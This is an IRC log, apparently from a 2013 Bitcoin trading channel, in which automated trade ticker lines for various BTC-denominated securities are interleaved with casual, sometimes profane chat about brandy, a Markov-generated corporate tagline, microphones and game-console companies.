[CBTC] 152 @ 0.00039989 = 0.0608 BTC [+] Sep 15 08:02:25 [MPEX] [S.MPOE] 4915 @ 0.00088386 = 4.3442 BTC [-] Sep 15 08:05:20 [BTCTC] [LABCOIN] 10 @ 0.001949 = 0.0195 BTC [+] Sep 15 08:05:21 [BTCTC] [LABCOIN] 10 @ 0.00195 = 0.0195 BTC [+] Sep 15 08:05:21 mircea_popescu: well, it was also funny when we would have execs visit from LVMH corp and they'd discover that Moët and Hennessey were both "gangsta" type products as well. They were not happy. Sep 15 08:05:29 mircea_popescu: http://www.arttaylor.com/~reeses/drop/8570-E8538-8569/Progre.mp3 btw Sep 15 08:06:03 [MPEX] [S.MPOE] 9032 @ 0.00088678 = 8.0094 BTC [+] Sep 15 08:06:05 [MPEX] [S.MPOE] 10768 @ 0.00088712 = 9.5525 BTC [+] Sep 15 08:06:42 [BTCTC] [LABCOIN] 636 @ 0.001992 = 1.2669 BTC [+] Sep 15 08:06:43 [BTCTC] [LABCOIN] 114 @ 0.001994 = 0.2273 BTC [+] Sep 15 08:06:45 [BTCTC] [LABCOIN] 250 @ 0.001994 = 0.4985 BTC [+] Sep 15 08:07:56 [BTCTC] [LABCOIN] 601 @ 0.001992 = 1.1972 BTC [-] Sep 15 08:07:56 [BTCTC] [LABCOIN] 114 @ 0.001994 = 0.2273 BTC [+] Sep 15 08:07:58 [BTCTC] [LABCOIN] 114 @ 0.001995 = 0.2274 BTC [+] Sep 15 08:07:59 [BTCTC] [LABCOIN] 50 @ 0.001999 = 0.1 BTC [+] Sep 15 08:08:00 [BTCTC] [LABCOIN] 25 @ 0.002 = 0.05 BTC [+] Sep 15 08:08:01 [BTCTC] [LABCOIN] 96 @ 0.002012 = 0.1932 BTC [+] Sep 15 08:08:14 to teh moon! Sep 15 08:08:45 [BTCTC] [LABCOIN] 505 @ 0.002012 = 1.0161 BTC [+] Sep 15 08:08:47 [BTCTC] [LABCOIN] 190 @ 0.002013 = 0.3825 BTC [+] Sep 15 08:08:59 [BTCTC] [LABCOIN] 5 @ 0.002013 = 0.0101 BTC [+] Sep 15 08:09:01 [BTCTC] [DMS.SELLING] 8 @ 0.009432 = 0.0755 BTC [+] Sep 15 08:13:02 reeses i guess they'd be a leetal out of touch. Sep 15 08:13:39 i distinctly recall a buncha romanian dorks being so fucking impressed with hennessy they put it on their song Sep 15 08:14:16 meanwhile they became the largest selling romanian rappers in history, and so consequently half the brandy drunk here is that, in spite of romania having much better stuff and definitely the world's best cognac on tap. Sep 15 08:14:43 yeah, same here Sep 15 08:14:52 well, you don't have the best cognac, by definition Sep 15 08:15:00 right, but you know what i mean. Sep 15 08:15:02 since it's an appellation :-) Sep 15 08:15:05 yeh yeh Sep 15 08:15:42 dude you sound sexy. Sep 15 08:15:46 so what's your romanian awesome brandy? Sep 15 08:16:15 [BTCTC] [ASICMINER-PT] 2 @ 2.101 = 4.202 BTC [-] Sep 15 08:16:17 [BTCTC] [ASICMINER-PT] 6 @ 2.1 = 12.6 BTC [-] Sep 15 08:16:18 [BTCTC] [ASICMINER-PT] 3 @ 2.1 = 6.3 BTC [-] Sep 15 08:16:18 [BTCTC] [ASICMINER-PT] 2 @ 2.075 = 4.15 BTC [-] Sep 15 08:16:19 [BTCTC] [ASICMINER-PT] 1 @ 2.071 BTC [-] Sep 15 08:16:21 [BTCTC] [ASICMINER-PT] 5 @ 2.07 = 10.35 BTC [-] Sep 15 08:16:22 [BTCTC] [ASICMINER-PT] 1 @ 2.059 BTC [-] Sep 15 08:16:23 [BTCTC] [ASICMINER-PT] 1 @ 2.055 BTC [-] Sep 15 08:16:24 [BTCTC] [ASICMINER-PT] 1 @ 2.046 BTC [-] Sep 15 08:16:25 [BTCTC] [ASICMINER-PT] 5 @ 2.045 = 10.225 BTC [-] Sep 15 08:16:26 [BTCTC] [ASICMINER-PT] 1 @ 2.041 BTC [-] Sep 15 08:16:27 [BTCTC] [ASICMINER-PT] 5 @ 2.04 = 10.2 BTC [-] Sep 15 08:16:40 reeses && mircea_popescu: who is this reeses human? Sep 15 08:16:42 http://e-murfatlar.ro/vinars-zaraza/zaraza-xo-extra-old Sep 15 08:17:14 benkay old timer, got mostly cleanned out by smart investment long before asicminer was a glimmer in its daddy's eye Sep 15 08:17:40 also apparently the owner of the world's worst fucking tagline. Sep 15 08:17:42 there's a cheap slovak vodka bottled and sold here in the US, it's funny (http://www.adweek.com/news/advertising-branding/double-cross-vodka-gets-makeover-105906) Sep 15 08:17:47 "Drawing on extensive cross-domain industry experience along with broad and deep technical expertise and innovation, Art Taylor LLC translates business strategy and goals into predictable technology initiatives with solutions that produce measurable results." Sep 15 08:17:57 can you fucking explain that omg. Sep 15 08:18:09 "yes! we! can!" Sep 15 08:18:15 it's a bs generator ;> Sep 15 08:18:20 it hastabe. Sep 15 08:18:22 markov chain baby Sep 15 08:18:27 i just hope for your sake it has great tits. Sep 15 08:18:47 I can't remember what I seeded it with Sep 15 08:18:50 I think the big 4 Sep 15 08:18:54 it reads like pre-mp pr. Sep 15 08:19:40 man I wish I kept the source Sep 15 08:19:45 the corpus, that is Sep 15 08:19:55 I think it was mainly accenture and mckinsey Sep 15 08:19:59 lol Sep 15 08:20:06 hm Sep 15 08:20:10 we were cackling when it started spitting things out Sep 15 08:20:26 anyway, seriously, if you ever go bankrupt and everything you should probably start a voicing career. Sep 15 08:20:33 then picked a couple semi-plausible ones that clients would scratch their heads Sep 15 08:20:35 heheh Sep 15 08:20:43 good to know Sep 15 08:20:50 and allow me to pat myself on the back quite publicly for my fucking otherworldly transcendent talkent picking abilities. Sep 15 08:20:54 bitches love my pipes Sep 15 08:21:10 i mean it's one thing to tell girls they prolly have a great body under the bikini. quite another to cold call people's reading. Sep 15 08:21:34 reeses be a darling leave the link as a comment ? will ye ? Sep 15 08:21:40 hah sure Sep 15 08:22:53 lol mircea_popescu is gonna hate what I use mpex for in october XD Sep 15 08:24:23 fuck it, im reading it myself. Sep 15 08:25:43 aw man! Sep 15 08:25:49 [HAVELOCK] [XBOND] 252 @ 0.00118905 = 0.2996 BTC [+] Sep 15 08:25:50 i was just practicing. Sep 15 08:26:12 [HAVELOCK] [XBOND] 504 @ 0.00119 = 0.5998 BTC [+] Sep 15 08:26:16 [HAVELOCK] [XBOND] 149 @ 0.00119 = 0.1773 BTC [+] Sep 15 08:27:58 [BTCTC] [COGNITIVE] 1 @ 0.2104 BTC [-] Sep 15 08:27:58 [BTCTC] [COGNITIVE] 2 @ 0.2104 = 0.4208 BTC [-] Sep 15 08:28:00 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [-] Sep 15 08:28:01 [BTCTC] [COGNITIVE] 3 @ 0.19 = 0.57 BTC [-] Sep 15 08:28:02 [BTCTC] [COGNITIVE] 4 @ 0.1896 = 0.7584 BTC [-] Sep 15 08:28:03 [BTCTC] [COGNITIVE] 1 @ 0.1893 BTC [-] Sep 15 08:28:05 [BTCTC] [COGNITIVE] 3 @ 0.181 = 0.543 BTC [-] Sep 15 08:28:06 [BTCTC] [COGNITIVE] 10 @ 0.18 = 1.8 BTC [-] Sep 15 08:28:07 [BTCTC] [COGNITIVE] 10 @ 0.17 = 1.7 BTC [-] Sep 15 08:32:58 I'm going to do it, but I have to make the mic work first Sep 15 08:33:08 [HAVELOCK] [XBOND] 4 @ 0.00119 = 0.0048 BTC [+] Sep 15 08:33:41 doesn't work on my ~2BTC sound card, it's not loud enough Sep 15 08:33:57 fine, don't approve my post! Sep 15 08:35:36 done! Sep 15 08:35:56 so my mic is fucked ;/ Sep 15 08:37:20 pankkake you on alsamixer ? Sep 15 08:37:36 yeah but that's not the issue. I enabled any mic boost option Sep 15 08:37:49 it's a line in, not thought for mics Sep 15 08:38:00 and I didn't hook up the mic thing that should be in front Sep 15 08:38:05 I'm going to use my laptop Sep 15 08:42:39 [BTCTC] [CIPHERMINE-PT] 9 @ 0.05998 = 0.5398 BTC [+] Sep 15 08:45:34 [BTCTC] [DMS.PURCHASE] 2000 @ 0.01193 = 23.86 BTC [+] Sep 15 08:48:06 [BTCTC] [ACTIVEMINING] 10 @ 0.002639 = 0.0264 BTC [+] Sep 15 08:48:08 [BTCTC] [ACTIVEMINING] 10 @ 0.00264 = 0.0264 BTC [+] Sep 15 08:49:59 [BTCTC] [ACTIVEMINING] 439 @ 0.002743 = 1.2042 BTC [+] Sep 15 08:49:59 [BTCTC] [ACTIVEMINING] 439 @ 0.002746 = 1.2055 BTC [+] Sep 15 08:50:00 [BTCTC] [ACTIVEMINING] 35 @ 0.002757 = 0.0965 BTC [+] Sep 15 08:50:02 [BTCTC] [ACTIVEMINING] 35 @ 0.002758 = 0.0965 BTC [+] Sep 15 08:51:54 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.000545 = 0.0153 BTC [-] Sep 15 08:52:11 [BTCTC] [ASICMINER-PT] 3 @ 2.011 = 6.033 BTC [-] Sep 15 08:53:40 [BTCTC] [LABCOIN] 21 @ 0.001926 = 0.0404 BTC [-] Sep 15 08:53:42 [BTCTC] [LABCOIN] 129 @ 0.001925 = 0.2483 BTC [-] Sep 15 08:55:58 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.000545 = 0.0027 BTC [-] Sep 15 09:03:41 [BTCTC] [ASICMINER-PT] 2 @ 2.117 = 4.234 BTC [+] Sep 15 09:03:42 [BTCTC] [DMS.MINING] 15 @ 0.002585 = 0.0388 BTC [+] Sep 15 09:03:43 [BTCTC] [ASICMINER-PT] 11 @ 2.139 = 23.529 BTC [+] Sep 15 09:03:45 [BTCTC] [DMS.MINING] 491 @ 0.002584 = 1.2687 BTC [-] Sep 15 09:03:46 [BTCTC] [ASICMINER-PT] 2 @ 2.139 = 4.278 BTC [+] Sep 15 09:03:47 [BTCTC] [DMS.MINING] 292 @ 0.00258 = 0.7534 BTC [-] Sep 15 09:03:47 [BTCTC] [ASICMINER-PT] 10 @ 2.14 = 21.4 BTC [+] Sep 15 09:03:48 [BTCTC] [DMS.MINING] 300 @ 0.002541 = 0.7623 BTC [-] Sep 15 09:03:49 [BTCTC] [DMS.MINING] 902 @ 0.00254 = 2.2911 BTC [-] Sep 15 09:13:09 [BTCTC] [BASIC-MINING] 1 @ 0.1165 BTC [+] Sep 15 09:19:43 ;;nethash Sep 15 09:19:44 952766.124776 Sep 15 09:20:03 [MPEX] [S.MPOE] 7587 @ 0.00088386 = 6.7058 BTC [-] Sep 15 09:20:20 that's the only thing going up Sep 15 09:23:08 [BTCTC] [LABCOIN] 89 @ 0.002001 = 0.1781 BTC [+] Sep 15 09:28:51 [BTCTC] [COGNITIVE] 3 @ 0.2103 = 0.6309 BTC [+] Sep 15 09:29:06 [BTCTC] [COGNITIVE] 1 @ 0.2103 BTC [+] Sep 15 09:29:21 [BTCTC] [COGNITIVE] 1 @ 0.2104 BTC [+] Sep 15 09:31:17 [MPEX] [S.MPOE] 4713 @ 0.00088346 = 4.1637 BTC [-] Sep 15 09:31:19 [MPEX] [S.MPOE] 1580 @ 0.00088712 = 1.4016 BTC [+] Sep 15 09:31:33 [MPEX] [S.MPOE] 4969 @ 0.00088902 = 4.4175 BTC [+] Sep 15 09:31:45 [MPEX] [S.MPOE] 710 @ 0.00088947 = 0.6315 BTC [+] Sep 15 09:31:54 [HAVELOCK] [XBOND] 1 @ 0.00119 BTC [+] Sep 15 09:48:48 [MPEX] [S.MPOE] 11600 @ 0.00088236 = 10.2354 BTC [-] Sep 15 09:48:49 [MPEX] [S.MPOE] 13250 @ 0.00088208 = 11.6876 BTC [-] Sep 15 09:48:54 [BTCTC] [ASICMINER-PT] 1 @ 2.01 BTC [-] Sep 15 09:49:11 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:49:12 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:49:13 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:49:14 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:49:16 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:49:23 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:49:24 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:49:26 [BTCTC] [LABCOIN] 1 @ 0.001997 BTC [-] Sep 15 09:50:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.0199 = 0.199 BTC [-] Sep 15 09:50:07 [BTCTC] [TAT.ASICMINER] 36 @ 0.01963 = 0.7067 BTC [-] Sep 15 09:50:09 [BTCTC] [TAT.ASICMINER] 57 @ 0.01961 = 1.1178 BTC [-] Sep 15 09:51:12 [BTCTC] [LABCOIN] 521 @ 0.001994 = 1.0389 BTC [-] Sep 15 09:51:12 [BTCTC] [LABCOIN] 270 @ 0.001996 = 0.5389 BTC [+] Sep 15 09:51:29 [BTCTC] [LABCOIN] 9 @ 0.001996 = 0.018 BTC [+] Sep 15 09:54:16 [BTCTC] [DMS.SELLING] 251 @ 0.009432 = 2.3674 BTC [+] Sep 15 09:55:00 [BTCTC] [DMS.SELLING] 49 @ 0.00955 = 0.468 BTC [+] Sep 15 09:56:15 mircea_popescu: it's really fun to read Sep 15 09:56:23 maybe I'm not used to poetry Sep 15 09:56:34 [HAVELOCK] [LABCO] 500 @ 0.0023 = 1.15 BTC [+] Sep 15 09:56:38 [HAVELOCK] [LABCO] 363 @ 0.00228 = 0.8276 BTC [-] Sep 15 09:56:41 I'm struggling on some words so no audio for now :( Sep 15 09:56:42 [HAVELOCK] [LABCO] 37 @ 0.00228 = 0.0844 BTC [-] Sep 15 09:57:00 [HAVELOCK] [LABCO] 28 @ 0.00228 = 0.0638 BTC [-] Sep 15 09:57:32 [BTCTC] [MININGCO.ETF] 10 @ 0.09 = 0.9 BTC [-] Sep 15 10:00:01 ;;premium mtgox bitstamp Sep 15 10:00:05 mtgox premium over bitstamp is currently 10.1871972877 %. Sep 15 10:01:15 hehe it is fun to read. Sep 15 10:01:29 [BTCTC] [BTC-GROWTH] 2 @ 0.1025 = 0.205 BTC [+] Sep 15 10:03:46 [HAVELOCK] [CBTC] 1000 @ 0.00039 = 0.39 BTC [-] Sep 15 10:19:02 [BTCTC] [ASICMINER-PT] 1 @ 2.019 BTC [+] Sep 15 10:21:42 [BTCTC] [ASICMINER-PT] 4 @ 2.014 = 8.056 BTC [-] Sep 15 10:21:45 [BTCTC] [ASICMINER-PT] 1 @ 2.019 BTC [+] Sep 15 10:26:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.01961 = 0.0981 BTC [-] Sep 15 10:26:55 [BTCTC] [TAT.ASICMINER] 32 @ 0.01961 = 0.6275 BTC [-] Sep 15 10:26:56 [BTCTC] [TAT.ASICMINER] 66 @ 0.0196 = 1.2936 BTC [-] Sep 15 10:37:35 [HAVELOCK] [AM100] 3 @ 0.02019999 = 0.0606 BTC [+] Sep 15 10:43:16 so fucking hell. sony made half a billion. it does everything, from chips to being a total IP asshole conclave. Sep 15 10:43:44 sega made the same half billion. on ~5bn income rather that sony's 75bn, and while doing... nothing Sep 15 10:43:56 i mean what the fuck, since the dreamcast 10 years ago what have they done ? Sep 15 10:44:45 sonic for iphone Sep 15 10:46:10 sega stopped being stupid and got out of hardware Sep 15 10:46:59 [MPEX] [S.MPOE] 350 @ 0.00088208 = 0.3087 BTC [-] Sep 15 10:47:00 [MPEX] [S.MPOE] 7500 @ 0.00088121 = 6.6091 BTC [-] Sep 15 10:47:32 and yet they had good hardware Sep 15 10:48:21 so did a lot of companies (SGI, etc.) but they still got hosed Sep 15 10:48:50 competitive/comparative advantage Sep 15 10:49:42 they failed to adapt Sep 15 10:49:57 reeses i am still surprised they didn't die the fuck out. Sep 15 10:50:16 i mean pre dreamcast, they did that saturn lol Sep 15 10:51:12 anyway, the moral here is twofold. part 1 : microsoft xbox went nowhere in spite of being pushed by microsoft marketeers. originally it was going to do 200mn polycount. then 300mn. then 125. then it demoed 60. Sep 15 10:51:32 part 2 : if sega/ms can't make it into hardware... neither can randombitcoinforumcompany. Sep 15 10:51:34 polycount? Sep 15 10:51:42 polygon count Sep 15 10:51:46 oh Sep 15 10:51:50 so kinda like bitcoin asics Sep 15 10:51:54 yup Sep 15 10:52:01 we don't have the red ring of death though Sep 15 10:54:13 [BTCTC] [BTC-BOND] 9 @ 0.01 = 0.09 BTC [+] Sep 15 10:59:08 ;;nethash Sep 15 10:59:09 973708.761997 Sep 15 11:00:34 mircea_popescu: http://headfucking.net/tmp/p2.ogg my best take. pretty horrible :/ Sep 15 11:00:59 comment on the post tho Sep 15 11:01:05 I struggle with some words and then there's the bad audio quality Sep 15 11:01:13 I don't know, I might try to do better Sep 15 11:02:33 well ok then. Sep 15 11:02:44 unless it's hopelessly shitty Sep 15 11:06:12 [HAVELOCK] [CBTC] 1 @ 0.00039899 BTC [+] Sep 15 11:06:28 [HAVELOCK] [CBTC] 1 @ 0.00039899 BTC [+] Sep 15 11:06:50 [BTCTC] [BTC-GROWTH] 7 @ 0.1031 = 0.7217 BTC [+] Sep 15 11:07:13 [BTCTC] [BASIC-MINING] 3 @ 0.122 = 0.366 BTC [+] Sep 15 11:07:50 [BTCTC] [LABCOIN] 3 @ 0.002023 = 0.0061 BTC [+] Sep 15 11:19:03 [BTCTC] [COGNITIVE] 1 @ 0.21 BTC [-] Sep 15 11:32:03 [BTCTC] [ASICMINER-PT] 1 @ 2.02 BTC [+] Sep 15 11:34:55 [BTCTC] [LABCOIN] 10 @ 0.002005 = 0.0201 BTC [-] Sep 15 11:36:38 [BTCTC] [LABCOIN] 990 @ 0.002005 = 1.985 BTC [-] Sep 15 11:42:21 [BTCTC] [ACTIVEMINING] 10 @ 0.002705 = 0.0271 BTC [-] Sep 15 11:42:23 [BTCTC] [ACTIVEMINING] 10 @ 0.002706 = 0.0271 BTC [+] Sep 15 11:42:24 [BTCTC] [ACTIVEMINING] 150 @ 0.002719 = 0.4079 BTC [+] Sep 15 11:42:25 [BTCTC] [ACTIVEMINING] 150 @ 0.00272 = 0.408 BTC [+] **** BEGIN LOGGING AT Sun Sep 15 19:06:59 2013 **** ENDING LOGGING AT Sun Sep 15 19:07:18 2013 **** BEGIN LOGGING AT Sun Sep 15 19:08:05 2013 Sep 15 19:11:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02006 BTC [-] Sep 15 19:12:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02006 BTC [-] Sep 15 19:13:34 [BTCTC] [DMS.SELLING] 511 @ 0.007399 = 3.7809 BTC [-] Sep 15 19:13:58 [BTCTC] [DMS.SELLING] 272 @ 0.00735 = 1.9992 BTC [-] Sep 15 19:14:13 [BTCTC] [DMS.MINING] 9 @ 0.002631 = 0.0237 BTC [+] Sep 15 19:15:07 [BTCTC] [DMS.SELLING] 500 @ 0.007299 = 3.6495 BTC [-] Sep 15 19:15:08 [BTCTC] [PETA-MINE] 1 @ 0.6596 BTC [-] Sep 15 19:16:05 [BTCTC] [LABCOIN] 200 @ 0.002075 = 0.415 BTC [+] Sep 15 19:16:05 [BTCTC] [DMS.PURCHASE] 350 @ 0.009377 = 3.282 BTC [-] Sep 15 19:16:08 [BTCTC] [LABCOIN] 472 @ 0.002075 = 0.9794 BTC [+] Sep 15 19:16:09 [BTCTC] [LABCOIN] 578 @ 0.002076 = 1.1999 BTC [+] Sep 15 19:17:23 [HAVELOCK] [XBOND] 2 @ 0.00119 = 0.0024 BTC [+] Sep 15 19:17:32 [MPEX] [S.MPOE] 13450 @ 0.00088662 = 11.925 BTC [+] Sep 15 19:18:02 [BTCTC] [DMS.MINING] 20 @ 0.00246 = 0.0492 BTC [-] Sep 15 19:18:04 [BTCTC] [DMS.MINING] 1 @ 0.002448 BTC [-] Sep 15 19:18:05 [BTCTC] [DMS.MINING] 70 @ 0.002445 = 0.1712 BTC [-] Sep 15 19:18:06 [BTCTC] [DMS.MINING] 259 @ 0.002425 = 0.6281 BTC [-] Sep 15 19:19:16 [BTCTC] [CIPHERMINE.B1] 10 @ 0.01056 = 0.1056 BTC [+] Sep 15 19:19:32 [BTCTC] [LABCOIN] 259 @ 0.002002 = 0.5185 BTC [-] Sep 15 19:19:33 [BTCTC] [LABCOIN] 140 @ 0.002 = 0.28 BTC [-] Sep 15 19:19:47 [BTCTC] [LABCOIN] 259 @ 0.002002 = 0.5185 BTC [+] Sep 15 19:19:49 [BTCTC] [LABCOIN] 259 @ 0.002 = 0.518 BTC [-] Sep 15 19:20:14 [BTCTC] [LABCOIN] 140 @ 0.002 = 0.28 BTC [-] Sep 15 19:20:53 [BTCTC] [LABCOIN] 38 @ 0.002076 = 0.0789 BTC [+] Sep 15 19:22:19 [BTCTC] [DMS.MINING] 1 @ 0.002595 BTC [+] Sep 15 19:22:31 [BTCTC] [DMS.PURCHASE] 118 @ 0.009377 = 1.1065 BTC [-] Sep 15 19:23:10 [BTCTC] [BTC-BOND] 50 @ 0.01 = 0.5 BTC [+] Sep 15 19:25:20 [BTCTC] [COGNITIVE] 1 @ 0.2279 BTC [+] Sep 15 19:26:07 [BTCTC] [DMS.PURCHASE] 3000 @ 0.009377 = 28.131 BTC [-] Sep 15 19:26:38 [BTCTC] [DMS.SELLING] 150 @ 0.0069 = 1.035 BTC [-] Sep 15 19:28:38 [BTCTC] [DMS.PURCHASE] 80 @ 0.009377 = 0.7502 BTC [-] Sep 15 19:29:31 [BTCTC] [DMS.MINING] 5 @ 0.002462 = 0.0123 BTC [-] Sep 15 19:29:32 [BTCTC] [DMS.MINING] 113 @ 0.002426 = 0.2741 BTC [-] Sep 15 19:30:22 [BTCTC] [DMS.MINING] 94 @ 0.002426 = 0.228 BTC [-] Sep 15 19:30:24 [BTCTC] [DMS.MINING] 741 @ 0.002425 = 1.7969 BTC [-] Sep 15 19:30:25 [BTCTC] [DMS.MINING] 9 @ 0.002411 = 0.0217 BTC [-] Sep 15 19:30:26 [BTCTC] [DMS.MINING] 20 @ 0.00241 = 0.0482 BTC [-] Sep 15 19:30:27 [BTCTC] [DMS.MINING] 2 @ 0.002409 = 0.0048 BTC [-] Sep 15 19:30:29 [BTCTC] [DMS.MINING] 17 @ 0.002408 = 0.0409 BTC [-] Sep 15 19:30:30 [BTCTC] [DMS.MINING] 1000 @ 0.002406 = 2.406 BTC [-] Sep 15 19:30:30 [BTCTC] [DMS.MINING] 1117 @ 0.002406 = 2.6875 BTC [-] Sep 15 19:32:50 [BTCTC] [BITVPS] 1 @ 0.001801 BTC [+] Sep 15 19:33:55 [BTCTC] [DMS.SELLING] 350 @ 0.007079 = 2.4777 BTC [+] Sep 15 19:34:24 [BTCTC] [DMS.SELLING] 157 @ 0.00708 = 1.1116 BTC [+] Sep 15 19:34:25 [BTCTC] [DMS.SELLING] 500 @ 0.007099 = 3.5495 BTC [+] Sep 15 19:34:54 [BTCTC] [DMS.PURCHASE] 272 @ 0.009377 = 2.5505 BTC [-] Sep 15 19:35:50 [BTCTC] [DMS.PURCHASE] 1500 @ 0.009377 = 14.0655 BTC [-] Sep 15 19:35:51 [BTCTC] [DMS.SELLING] 100 @ 0.00715 = 0.715 BTC [+] Sep 15 19:38:56 [BTCTC] [DMS.MINING] 38 @ 0.002491 = 0.0947 BTC [+] Sep 15 19:38:58 [BTCTC] [DMS.MINING] 234 @ 0.002406 = 0.563 BTC [-] Sep 15 19:41:54 [BTCTC] [LABCOIN] 134 @ 0.002076 = 0.2782 BTC [+] Sep 15 19:41:55 [BTCTC] [LABCOIN] 850 @ 0.002089 = 1.7757 BTC [+] Sep 15 19:41:56 [BTCTC] [LABCOIN] 50 @ 0.002094 = 0.1047 BTC [+] Sep 15 19:43:02 [BTCTC] [DMS.SELLING] 272 @ 0.007198 = 1.9579 BTC [+] Sep 15 19:43:02 [BTCTC] [DMS.SELLING] 225 @ 0.007199 = 1.6198 BTC [+] Sep 15 19:44:40 [BTCTC] [DMS.SELLING] 20 @ 0.007199 = 0.144 BTC [+] Sep 15 19:44:55 [BTCTC] [DMS.PURCHASE] 272 @ 0.009377 = 2.5505 BTC [-] Sep 15 19:46:05 [BTCTC] [DMS.MINING] 93 @ 0.002407 = 0.2239 BTC [+] Sep 15 19:46:07 [BTCTC] [DMS.MINING] 182 @ 0.002406 = 0.4379 BTC [-] Sep 15 19:46:21 [BTCTC] [DMS.MINING] 1467 @ 0.002406 = 3.5296 BTC [-] Sep 15 19:46:34 [BTCTC] [DMS.MINING] 33 @ 0.002405 = 0.0794 BTC [-] Sep 15 19:46:37 [BTCTC] [DMS.SELLING] 100 @ 0.007197 = 0.7197 BTC [-] Sep 15 19:46:53 [BTCTC] [B.YABMC] 1 @ 0.0012 BTC [+] Sep 15 19:48:03 [BTCTC] [DMS.MINING] 1 @ 0.002405 BTC [-] Sep 15 19:48:07 [BTCTC] [DMS.MINING] 4 @ 0.002405 = 0.0096 BTC [-] Sep 15 19:48:55 [BTCTC] [DMS.MINING] 272 @ 0.002405 = 0.6542 BTC [-] Sep 15 19:50:23 [BTCTC] [COGNITIVE] 1 @ 0.1894 BTC [-] Sep 15 19:50:25 [BTCTC] [COGNITIVE] 1 @ 0.1811 BTC [-] Sep 15 19:50:27 [BTCTC] [COGNITIVE] 1 @ 0.18 BTC [-] Sep 15 19:50:38 [BTCTC] [LABCOIN] 2 @ 0.00197 = 0.0039 BTC [-] Sep 15 19:50:39 [BTCTC] [COGNITIVE] 3 @ 0.1754 = 0.5262 BTC [-] Sep 15 19:50:41 [BTCTC] [DMS.PURCHASE] 1 @ 0.009377 BTC [-] Sep 15 19:50:42 [BTCTC] [LABCOIN] 38 @ 0.001966 = 0.0747 BTC [-] Sep 15 19:50:43 [BTCTC] [COGNITIVE] 10 @ 0.175 = 1.75 BTC [-] Sep 15 19:50:45 [BTCTC] [COGNITIVE] 3 @ 0.171 = 0.513 BTC [-] Sep 15 19:50:46 [BTCTC] [LABCOIN] 75 @ 0.001965 = 0.1474 BTC [-] Sep 15 19:50:46 [BTCTC] [COGNITIVE] 1 @ 0.1704 BTC [-] Sep 15 19:50:47 [BTCTC] [LABCOIN] 305 @ 0.001964 = 0.599 BTC [-] Sep 15 19:50:48 [BTCTC] [LABCOIN] 100 @ 0.001963 = 0.1963 BTC [-] Sep 15 19:50:50 [BTCTC] [LABCOIN] 1000 @ 0.001962 = 1.962 BTC [-] Sep 15 19:50:51 [BTCTC] [LABCOIN] 200 @ 0.001961 = 0.3922 BTC [-] Sep 15 19:50:52 [BTCTC] [LABCOIN] 2000 @ 0.00196 = 3.92 BTC [-] Sep 15 19:50:53 [BTCTC] [LABCOIN] 9 @ 0.001956 = 0.0176 BTC [-] Sep 15 19:50:55 [BTCTC] [LABCOIN] 95 @ 0.001955 = 0.1857 BTC [-] Sep 15 19:50:56 [BTCTC] [LABCOIN] 11 @ 0.001954 = 0.0215 BTC [-] Sep 15 19:50:57 [BTCTC] [LABCOIN] 116 @ 0.001953 = 0.2265 BTC [-] Sep 15 19:50:58 [BTCTC] [LABCOIN] 520 @ 0.001952 = 1.015 BTC [-] Sep 15 19:50:58 [BTCTC] [LABCOIN] 200 @ 0.001951 = 0.3902 BTC [-] Sep 15 19:50:59 [BTCTC] [DMS.PURCHASE] 31 @ 0.009377 = 0.2907 BTC [-] Sep 15 19:51:00 [BTCTC] [LABCOIN] 5000 @ 0.00195 = 9.75 BTC [-] Sep 15 19:51:02 [BTCTC] [LABCOIN] 1 @ 0.00195 BTC [-] Sep 15 19:51:03 [BTCTC] [LABCOIN] 9 @ 0.001941 = 0.0175 BTC [-] Sep 15 19:51:04 [BTCTC] [LABCOIN] 99 @ 0.00194 = 0.1921 BTC [-] Sep 15 19:51:05 [BTCTC] [LABCOIN] 9 @ 0.001926 = 0.0173 BTC [-] Sep 15 19:51:06 [BTCTC] [LABCOIN] 95 @ 0.001925 = 0.1829 BTC [-] Sep 15 19:51:07 [BTCTC] [LABCOIN] 4500 @ 0.001922 = 8.649 BTC [-] Sep 15 19:51:08 [BTCTC] [LABCOIN] 610 @ 0.001921 = 1.1718 BTC [-] Sep 15 19:51:08 [BTCTC] [LABCOIN] 100 @ 0.00192 = 0.192 BTC [-] Sep 15 19:51:09 [BTCTC] [LABCOIN] 1500 @ 0.00192 = 2.88 BTC [-] Sep 15 19:52:06 [BTCTC] [LABCOIN] 450 @ 0.001922 = 0.8649 BTC [+] Sep 15 19:52:07 [BTCTC] [LABCOIN] 1 @ 0.001921 BTC [-] Sep 15 19:52:23 [BTCTC] [LABCOIN] 1222 @ 0.00192 = 2.3462 BTC [-] Sep 15 19:52:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.01985 = 0.1985 BTC [-] Sep 15 19:52:29 [BTCTC] [LABCOIN] 600 @ 0.002095 = 1.257 BTC [+] Sep 15 19:52:30 [BTCTC] [LABCOIN] 559 @ 0.002097 = 1.1722 BTC [+] Sep 15 19:52:31 [BTCTC] [TAT.ASICMINER] 6 @ 0.01983 = 0.119 BTC [-] Sep 15 19:52:32 [BTCTC] [LABCOIN] 841 @ 0.002099 = 1.7653 BTC [+] Sep 15 19:52:34 [BTCTC] [TAT.ASICMINER] 5 @ 0.01982 = 0.0991 BTC [-] Sep 15 19:52:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.01981 = 0.1585 BTC [-] Sep 15 19:52:35 [BTCTC] [TAT.ASICMINER] 7 @ 0.0198 = 0.1386 BTC [-] Sep 15 19:52:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.01971 = 0.0986 BTC [-] Sep 15 19:52:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.0197 = 0.0394 BTC [-] Sep 15 19:52:39 [BTCTC] [TAT.ASICMINER] 7 @ 0.0196 = 0.1372 BTC [-] Sep 15 19:53:22 [BTCTC] 